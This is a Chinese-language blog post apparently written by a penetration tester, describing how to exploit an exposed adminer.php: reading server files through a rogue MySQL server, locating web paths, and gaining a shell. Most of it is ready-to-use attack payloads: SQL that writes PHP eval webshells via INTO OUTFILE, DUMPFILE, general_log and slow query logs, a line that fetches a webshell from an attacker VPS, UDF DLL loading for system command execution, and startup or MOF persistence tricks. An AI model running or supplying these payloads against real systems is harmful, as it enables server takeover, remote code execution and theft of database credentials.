<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="tiehanhan" />
  <meta name="description" content="" />
  
  
  <title>
    
      一次adminer之旅 
      
      
      |
    
     daidaitiehanhan&#39;s blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/avater.gif">
    <link rel="icon" href="/images/avater.gif">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>

<meta name="generator" content="Hexo 6.1.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.gif" alt="">
      
    </a>
    <div class="nickname"><a href="/">tiehanhan</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">一次adminer之旅</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2022-04-13 16:36:19
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="发现"><a href="#发现" class="headerlink" title="发现"></a>发现</h2><p>某次项目中遇到扫目录中奖了adminer.php，所以对adminer的利用做个小总结。</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><h3 id="确定admirer版本"><a href="#确定admirer版本" class="headerlink" title="确定admirer版本"></a>确定admirer版本</h3><p>adminer的大概界面一般如下图，可以通过界面获取版本信息。</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206112601729.png" alt="image-20211206112601729"></p>
<p>而<strong>admirer&lt;&#x3D;4.6.2</strong>时，可以利用mysql的”LOAD DATA LOCAL INFILE”特性读取mysql客户端代码，当利用adminer去访问我们搭建的恶意mysql服务器，就可以读到adminer服务器上的任意源码。</p>
<h3 id="搭建恶意mysql服务器"><a href="#搭建恶意mysql服务器" class="headerlink" title="搭建恶意mysql服务器"></a>搭建恶意mysql服务器</h3><h4 id="MySQL-Fake-Server"><a href="#MySQL-Fake-Server" class="headerlink" title="MySQL_Fake_Server"></a>MySQL_Fake_Server</h4><p><a target="_blank" rel="noopener" href="https://github.com/fnmsd/MySQL_Fake_Server">https://github.com/fnmsd/MySQL_Fake_Server</a></p>
<p>python3写的，实战中跑起来后没有读到文件。</p>
<h4 id="Rogue-mysql-server"><a href="#Rogue-mysql-server" class="headerlink" title="Rogue_mysql_server"></a>Rogue_mysql_server</h4><p><a target="_blank" rel="noopener" href="https://github.com/rmb122/rogue_mysql_server">https://github.com/rmb122/rogue_mysql_server</a></p>
<p>go写的，实战跑起来没读到文件</p>
<h4 id="Rogue-Mysql-Server"><a href="#Rogue-Mysql-Server" class="headerlink" title="Rogue_Mysql_Server"></a>Rogue_Mysql_Server</h4><p><a target="_blank" rel="noopener" href="https://github.com/Gifts/Rogue-MySql-Server">https://github.com/Gifts/Rogue-MySql-Server</a></p>
<p>python2实现，能正常读文件，但是读到的文件长度有限制，无法读取大文件</p>
<h4 id="MysqlHoneypot"><a href="#MysqlHoneypot" class="headerlink" title="MysqlHoneypot"></a>MysqlHoneypot</h4><p><a target="_blank" rel="noopener" href="https://github.com/qigpig/MysqlHoneypot">https://github.com/qigpig/MysqlHoneypot</a></p>
<p>python2实现读微信ID的蜜罐，有个师傅在issues里提了读大文件的解决方法</p>
<p><a target="_blank" rel="noopener" href="https://github.com/qigpig/MysqlHoneypot/issues/5">https://github.com/qigpig/MysqlHoneypot/issues/5</a></p>
<p>参考缝缝改改可以正常在python2环境读大文件</p>
<h3 id="利用操作系统数据库文件获取网站绝对路径"><a href="#利用操作系统数据库文件获取网站绝对路径" class="headerlink" title="利用操作系统数据库文件获取网站绝对路径"></a>利用操作系统数据库文件获取网站绝对路径</h3><p>和大多数任意文件读取漏洞一样，我们要读到网站文件需要知道网站文件的绝对路径或者相对路径。</p>
<h4 id="判断操作系统"><a href="#判断操作系统" class="headerlink" title="判断操作系统"></a>判断操作系统</h4><p>通过盲读下列文件，可以判断当前系统的操作系统，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">windows系统:</span><br><span class="line">c:\\windows\\win.ini</span><br><span class="line">c:\\windows\\system32\\drivers\\etc\\hosts</span><br><span class="line">linux系统:</span><br><span class="line">/etc/passwd</span><br><span class="line">/etc/hosts</span><br></pre></td></tr></table></figure>

<h4 id="判断系统后进阶利用"><a href="#判断系统后进阶利用" class="headerlink" title="判断系统后进阶利用"></a>判断系统后进阶利用</h4><p>一种任意文件读取的通用利用思路就是读取系统源码，通过审计源码挖掘漏洞拿到服务器权限。另一种是配合一些开放的其他服务获得权限，比如adminer这种情景就可以读数据库配置，然后连接数据库执行sql语句写shell。但无论是读源码还是读配置文件，都会需要知道相应文件的路径，那我们怎么判断源码的路径呢？</p>
<p>windwos和linux系统都有一些特殊文件，我们尝试去读这些文件，就能获取到web服务的绝对路径。</p>
<h5 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h5><p><a target="_blank" rel="noopener" href="https://www.howtogeek.com/232779/how-to-rebuild-a-broken-icon-cache-in-windows-10/">https://www.howtogeek.com/232779/how-to-rebuild-a-broken-icon-cache-in-windows-10/</a></p>
<p>windows自带一个图标缓存的数据库,里面会各个文档文件的图标信息,即可以包含web服务的一些路径，结合任意文件读取或下载来获取web路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">win7和vista中icon cache路径</span><br><span class="line">C:\\Users\\&lt;your username&gt;\\AppData\\Local\\IconCache.db</span><br><span class="line">C:\\Users\\administrator\\AppData\\Local\\IconCache.db</span><br><span class="line">win8和win10也有上面的文件，但是真正使用的是下面路径中的数据库</span><br><span class="line">C:\\Users\\&lt;your username&gt;\\AppData\\Local\\Microsoft\\Windows\\Explorer</span><br><span class="line">C:\\Users\\administrator\\AppData\\Local\\Microsoft\\Windows\\Explorer</span><br><span class="line">•    iconcache_16.db</span><br><span class="line">•    iconcache_32.db</span><br><span class="line">•    iconcache_48.db</span><br><span class="line">•    iconcache_96.db</span><br><span class="line">•    iconcache_256.db</span><br><span class="line">•    iconcache_768.db</span><br><span class="line">•    iconcache_1280.db</span><br><span class="line">•    iconcache_1920.db</span><br><span class="line">•    iconcache_2560.db</span><br><span class="line">•    iconcache_custom_stream.db</span><br><span class="line">•    iconcache_exif.db</span><br><span class="line">•    iconcache_idx.db</span><br><span class="line">•    iconcache_sr.db</span><br><span class="line">•    iconcache_wide.db</span><br><span class="line">•    iconcache_wide_alternate.db</span><br></pre></td></tr></table></figure>

<p>解密IconCache.db的文件使用下面的脚本</p>
<p><a target="_blank" rel="noopener" href="https://github.com/cereme/FirstSound">https://github.com/cereme/FirstSound</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/Bikossor/Windows-IconFixer">https://github.com/Bikossor/Windows-IconFixer</a></p>
<p>IconCacheViewer.exe</p>
<h5 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h5><p>本质就是linux系统locate命令利用到的数据库，数据库文件里包含了系统内的所有本地文件路径信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/var/lib/mlocate/mlocate.db</span><br><span class="line">/var/lib/locate.db</span><br></pre></td></tr></table></figure>

<h3 id="利用php框架获取网站相对路径"><a href="#利用php框架获取网站相对路径" class="headerlink" title="利用php框架获取网站相对路径"></a>利用php框架获取网站相对路径</h3><p>因为本文章讨论的是adminer.php，网站一定是php的，所以可以先判断网站有无使用一些知名框架，如thinkphp,Laravel,yii等框架。即目标网站的文件路径可以参考对应php框架目录，下面以一次thinkphp 5.0.20实战案例为例</p>
<h5 id="Thinkphp"><a href="#Thinkphp" class="headerlink" title="Thinkphp"></a>Thinkphp</h5><p>扫目录发现目标存在adminer.php，且访问LICENSE.txt文件和页面报错可判断框架为thinkphp框架</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206143702220.png" alt="image-20211206143702220"></p>
<p>读文件判断操作系统，发现是windows系统，尝试读icon cache失败，即不能通过上面介绍的方法获得web服务的绝对路径</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206144247785.png" alt="image-20211206144247785"></p>
<p>尝试用adminer读取index.php(不管什么框架，有无二开，index.php文件都是我们可以通过黑盒观察目录结构判断到其相对于adminer.php的相对路径的,即该文件是一定能读到的)</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206143957915.png" alt="image-20211206143957915"></p>
<p>读index.php中写到的thinkphp&#x2F;start.php,提示thinkphp的引导文件是base.php</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206144926139.png" alt="image-20211206144926139"></p>
<p>读thinkphp&#x2F;base.php,该文件可以查看到thinkphp各模块对应目录，以及thinkphp版本等信息</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206145050899.png" alt="image-20211206145050899"></p>
<p>尝试读index.php中提到的build.php可以看到应用配置文件common.php,config.php,database.php</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206144815798.png" alt="image-20211206144815798"></p>
<p>一般的thinkphp应用目录是application,而本次这个目标的index.php中写了应用目录是apps，所以正确的配置文件路径是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apps/common.php</span><br><span class="line">apps/config.php</span><br><span class="line">apps/database.php</span><br></pre></td></tr></table></figure>

<p>成功读到数据库账号密码，可以登录adminer后台</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211206145520230.png" alt="image-20211206145520230"></p>
<h5 id="结论"><a href="#结论" class="headerlink" title="结论"></a>结论</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">遇到thinkphp5可关注的高价值文件</span><br><span class="line">index.php</span><br><span class="line">build.php</span><br><span class="line">thinkphp/base.php		thinkphp引导文件</span><br><span class="line">apps/common.php</span><br><span class="line">apps/config.php</span><br><span class="line">apps/database.php</span><br><span class="line">application/common.php</span><br><span class="line">application/config.php</span><br><span class="line">application/database.php</span><br></pre></td></tr></table></figure>

<h3 id="adminer后台战法"><a href="#adminer后台战法" class="headerlink" title="adminer后台战法"></a>adminer后台战法</h3><p>利用思路和拿到数据库权限怎么getshell的思路一致</p>
<h4 id="获取网站绝对路径"><a href="#获取网站绝对路径" class="headerlink" title="获取网站绝对路径"></a>获取网站绝对路径</h4><p>不管什么数据库，要写shell必须得知道网站的绝对路径，怎么搞绝对路径呢？</p>
<h5 id="网页报错"><a href="#网页报错" class="headerlink" title="网页报错"></a>网页报错</h5><p>部分网站配置不当，我们用adminer执行一些操作时会报错出adminer系统的web绝对路径</p>
<h5 id="操作系统数据库文件"><a href="#操作系统数据库文件" class="headerlink" title="操作系统数据库文件"></a>操作系统数据库文件</h5><p>Windows的IconCache或者linux的located.db</p>
<h5 id="手工猜测"><a href="#手工猜测" class="headerlink" title="手工猜测"></a>手工猜测</h5><p>可以先读取mysql的安装目录，再依据mysql的路径命名规则猜测网站路径。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select @@basedir</span><br></pre></td></tr></table></figure>

<h5 id="日志文件"><a href="#日志文件" class="headerlink" title="日志文件"></a>日志文件</h5><p>尝试读取网站的日志文件，尤其是报错日志，很可能有出错文件的绝对路径</p>
<p>例如上面的thinkphp案例，上述几种方式均没获取web路径，最终通过读日志找到路径。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">runtime/log/202111/30.log</span><br></pre></td></tr></table></figure>

<h5 id="数据库信息"><a href="#数据库信息" class="headerlink" title="数据库信息"></a>数据库信息</h5><p>翻越数据库中的信息，有可能因为一些配置功能能看到web路径</p>
<h4 id="写webshell"><a href="#写webshell" class="headerlink" title="写webshell"></a>写webshell</h4><p>以mysql数据库为例</p>
<h5 id="outfile"><a href="#outfile" class="headerlink" title="outfile"></a>outfile</h5><p>写shell需要判断当前有没有设置secure_file_priv，只有当secure_file_priv为空才有权限写文件，这个配置由my.ini定义，无法在执行sql的情景更改配置。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%secure%&#x27;;</span><br></pre></td></tr></table></figure>

<p>写入webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#写入常规一句话</span><br><span class="line">select &#x27;&lt;?php eval($_POST[&quot;x&quot;]) ?&gt;&#x27; into outfile &#x27;C:\\phpstudy_pro\\WWW\\loga.php&#x27;;</span><br><span class="line">#存到数据库表中再写入</span><br><span class="line">Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES(&#x27;&lt;?php eval($_POST[x]) ?&gt;&#x27;);Select cmd from temp into outfile &#x27;C:\\phpstudy_pro\\WWW\\loga.php&#x27;;Drop TABLE IF EXISTS temp;</span><br><span class="line">#使用hex编码写入</span><br><span class="line">select 0x3c3f706870206576616c28245f504f53545b2278225d29203f3e into outfile &#x27;C:\\phpstudy_pro\\WWW\\x.php&#x27;</span><br></pre></td></tr></table></figure>

<p>outfile可以导出多行数据，但是在将数据写到文件时mysql会对换行符(0a)，制表符(09)等特殊字符做处理。使用有换行符的webshell时，很多hex编码后换行符使用的是0a(即\n)，而0a会被outfile做特殊处理，除了换行符外还会额外增加一个\符号，所以我们写shell时如果用0a做换行符会破坏我们的webshell结构导致失败。</p>
<p>例如当我们尝试写入最简单的一个有换行符和制表符shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 0x3c3f7068700a096576616c28245f504f53545b2278646464646464646464225d3b0a3f3e into outfile &#x27;C:\\phpstudy_pro\\WWW\\xddddddddd.php&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211207144724913.png" alt="image-20211207144724913"></p>
<p>可以发现换行符0a的部分还被额外增加了一个\符号，且制表符处也增加了一个\符号，严重破坏了shell的文件结构。</p>
<p>不过经测试outfile下仍有**能正常用的换行符0d(即\r)**，所以我们手动把所有0a换行符换成0d就能正常写入换行的shell。</p>
<p>但是这并非万能的，虽然肉眼甚至一些diff下用\r替换\n做换行符后没啥区别，但一些情景例如某些加密需要用到公钥私钥，而公钥私钥中的换行符，如果我们强行替换到\r，会破坏其的格式导致其报错，所以对于一些使用公钥私钥的shell目前我仍没找到在outfile下直接写入他们的思路，只能使用file_put_contents的思路去写.</p>
<p><img src="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/image-20211207145229122.png" alt="image-20211207145229122"></p>
<p>poc如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#在同目录生成密码是cmd的一句话cmd.php</span><br><span class="line">select &#x27;&lt;?php file_put_contents(&quot;cmd.php&quot;,base64_decode(&quot;PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg==&quot;));?&gt;&#x27; into outfile &#x27;C:\\phpstudy_pro\\WWW\\1.php&#x27;</span><br></pre></td></tr></table></figure>

<h5 id="dumpfile"><a href="#dumpfile" class="headerlink" title="dumpfile"></a>dumpfile</h5><p>写shell需要判断当前有没有设置secure_file_priv，只有当secure_file_priv为空才有权限写文件，这个配置由my.ini定义，无法在执行sql的情景更改配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%secure%&#x27;;</span><br></pre></td></tr></table></figure>

<p>写入shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#写入常规一句话</span><br><span class="line">select &#x27;&lt;?php eval($_POST[&quot;x&quot;]) ?&gt;&#x27; into dumpfile &#x27;C:\\phpstudy_pro\\WWW\\loga.php&#x27;;</span><br><span class="line">#存到数据库表中再写入</span><br><span class="line">Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES(&#x27;&lt;?php eval($_POST[x]) ?&gt;&#x27;);Select cmd from temp into outfile &#x27;C:\\phpstudy_pro\\WWW\\loga.php&#x27;;Drop TABLE IF EXISTS temp;</span><br><span class="line">#使用hex编码写入</span><br><span class="line">select 0x3c3f706870206576616c28245f504f53545b2278225d29203f3e into outfile &#x27;C:\\phpstudy_pro\\WWW\\x.php&#x27;</span><br></pre></td></tr></table></figure>

<p>dumpfile只能导出一行数据，但是写入shell时不会像outfile那样有换行符的坑点，dumpfile写入文件时会严格保持原数据格式，所以我们打udf写入dll都用dumpfile</p>
<h5 id="general-log"><a href="#general-log" class="headerlink" title="general_log"></a>general_log</h5><p>利用日志getshell的方法不受secure_file_priv的限制，只要知道web绝对路径即可。</p>
<p>查询general_log的配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%general_log%&#x27;;		#查询general_log的配置，以便事后恢复</span><br><span class="line">#或</span><br><span class="line">select @@general_log_file		#查询general_log目录</span><br><span class="line">select @@general_log   #查询general_log是否开启，0表示未开启，1表示开启</span><br></pre></td></tr></table></figure>

<p>开启general_log</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set global general_log=&#x27;ON&#x27;;</span><br><span class="line">set global general_log_file=&#x27;C:\\phpstudy_pro\\WWW\\log.php&#x27;;</span><br><span class="line">#执行后应该立即能在网站访问到log.php文件</span><br></pre></td></tr></table></figure>

<p>写入webshell内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#任意写入一句话马</span><br><span class="line">select &#x27;&lt;?php @eval($_POST[01282095])?&gt;&#x27;</span><br><span class="line">#注意这里不能用hex编码，因为用了hex记录到log文件里的内容还是hex编码的内容，而不是hex编码后的内容。而且尽量用简短的马，内容多的马遇到一些特殊字符容易出错。</span><br><span class="line"></span><br><span class="line">#由于只要有sql语句执行就会记录到日志里，执行语句多了可能插入特殊字符导致我们的马被破坏结构。所以建议拿到权限后尽快传新的马并恢复原本的general_log配置。</span><br><span class="line">#应对这类情况一般我们可以传一个写文件的马,在同级目录生成密码是cmd的一句话cmd.php</span><br><span class="line">select &#x27;&lt;?php file_put_contents(&quot;cmd.php&quot;,base64_decode(&quot;PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg==&quot;));?&gt;&#x27;</span><br><span class="line">#或者远程加载</span><br><span class="line">select &#x27;&lt;?php file_put_contents(&quot;xx.php&quot;,file_get_contents(&quot;http://vpsip/webshell.txt&quot;);?&gt;&#x27;</span><br></pre></td></tr></table></figure>

<h5 id="slow-query-log-file"><a href="#slow-query-log-file" class="headerlink" title="slow_query_log_file"></a>slow_query_log_file</h5><p>利用慢日志getshell的方法也不受secure_file_priv的限制，只要知道web绝对路径即可。</p>
<p>查询慢日志的配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;%slow%&#x27;  #查询慢日志配置，以便事后恢复</span><br><span class="line">或</span><br><span class="line">select @@slow_query_log_file    #查询慢日志目录，以便事后恢复</span><br><span class="line">select @@slow_query_log			#查询慢日志是否开启，0表示未开启，1表示开启</span><br></pre></td></tr></table></figure>

<p>开启慢日志</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set GLOBAL slow_query_log_file=&#x27;C:\\phpstudy_pro\\WWW\\log.php&#x27;;</span><br><span class="line">set GLOBAL slow_query_log=on;</span><br></pre></td></tr></table></figure>

<p>写入webshell内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#和前面的general_log完全一致，只需要在sql语句结尾加上sleep(10)触发延时即可</span><br><span class="line">select &#x27;&lt;?php @eval($_POST[&quot;x&quot;])?&gt;&#x27; from mysql.db where sleep(10);</span><br><span class="line">#写文件shell</span><br><span class="line">select &#x27;&lt;?php file_put_contents(&quot;cmd.php&quot;,base64_decode(&quot;PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKSA/Pg==&quot;));?&gt;&#x27; from mysql.db where sleep(10);</span><br></pre></td></tr></table></figure>

<h4 id="写文件获取shell思路"><a href="#写文件获取shell思路" class="headerlink" title="写文件获取shell思路"></a>写文件获取shell思路</h4><p>以mysql为例,已知公开的不写webshel要获取服务器权限的思路，都是围绕利用写文件的特性写入各种特殊的文件触发命令执行等行为获取shell权限。</p>
<p> 所以仍需要判断当前有没有设置secure_file_priv，只有当secure_file_priv为空且secure_auth为OFF才有权限写文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%secure%&#x27;;</span><br></pre></td></tr></table></figure>

<h5 id="udf"><a href="#udf" class="headerlink" title="udf"></a>udf</h5><p>首先需要获取到plugin目录路径，因为mysql从5.0.67起，dll文件必须放在plugin目录才能加载。执行下列命令可以读取mysql的plugin目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select @@plugin_dir</span><br><span class="line">show global variables like &#x27;%plugin%&#x27;;</span><br></pre></td></tr></table></figure>

<p>如果mysql的plugin目录不存在，windows情景下我们可以利用ntfs流创建plugin目录，但是对mysql有一定版本限制，高版本的mysql做了降权，如果mysql安装在c盘，mysql将没有创建目录的权限。经测试5.5.29可以创建，5.7.26被降权不能创建文件夹</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select @@basedir; #查找mysql的目录</span><br><span class="line">select 0x20 into dumpfile &#x27;C:\\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib::$INDEX_ALLOCATION&#x27;; #使用NTFS ADS流创建lib目录</span><br><span class="line">select 0x20 into dumpfile &#x27;C:\\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin::$INDEX_ALLOCATION&#x27;; #利用NTFS ADS再次创建plugin目录</span><br></pre></td></tr></table></figure>

<p>准备好plugin目录后，需要查看操作系统的架构等信息，准备相应的dll或so</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select @@version_compile_os				#查看当前操作系统的架构</span><br><span class="line">select @@version_compile_machine;  #查看当前数据库的架构</span><br></pre></td></tr></table></figure>

<p>根据操作系统的架构写入相应的dll或so，可以自己网上找源码写了编译，自己编译的免杀效果会好一点，懒的直接取<a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql">msf</a>或者<a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/mysql">sqlmap</a>编译好的用也行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select 0x20 into dumpfile &quot;C:\\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin\\udf32.dll&quot;</span><br><span class="line">#其中的hex编码可以通过本机装个mysql然后用hex获得</span><br><span class="line">select hex(load_file(&#x27;C:\\Users\\xxx\\mysql\\msf\\lib_mysqludf_sys_64.dll&#x27;))</span><br></pre></td></tr></table></figure>

<p>利用dll创建函数，如果创建失败，十有八九是dll存在问题（被杀软干掉了或者架构不对等等）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">create function sys_exec returns int soname &#x27;udf32.dll&#x27;					#无回显执行系统命令</span><br><span class="line">select sys_exec(&#x27;ping qkc5y3.dnslog.cn&#x27;)</span><br><span class="line"></span><br><span class="line">create function sys_eval returns string soname &#x27;udf64.dll&#x27;			#回显执行系统命令</span><br><span class="line">select sys_eval(&#x27;whoami&#x27;)</span><br><span class="line">drop function sys_eval			# 删除sys_eval函数</span><br><span class="line"></span><br><span class="line">select * from mysql.func   #查询所有函数，判断是否创建成功</span><br></pre></td></tr></table></figure>

<h5 id="mof"><a href="#mof" class="headerlink" title="mof"></a>mof</h5><p><code>C:\Windows\System32\wbem\MOF</code>目录下的<code>nullevt.mof</code>文件，每分钟会去执行一次，如果写入我们的cmd命令，就可以达到执行计划任务的效果。</p>
<p>只有server2003或xp才有这个特性，实战基本上遇不上，不过能作为一个参考项</p>
<h5 id="lpk"><a href="#lpk" class="headerlink" title="lpk"></a>lpk</h5><p>很老的一个dll劫持思路，当与lpk.dll同目录下的exe被执行时，dll就会被执行。</p>
<p>也是只有server2003或xp才有漏洞</p>
<h5 id="windows启动项"><a href="#windows启动项" class="headerlink" title="windows启动项"></a>windows启动项</h5><p>就是写startup目录C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup，需要重启才能生效，不同操作系统路径有差异。</p>
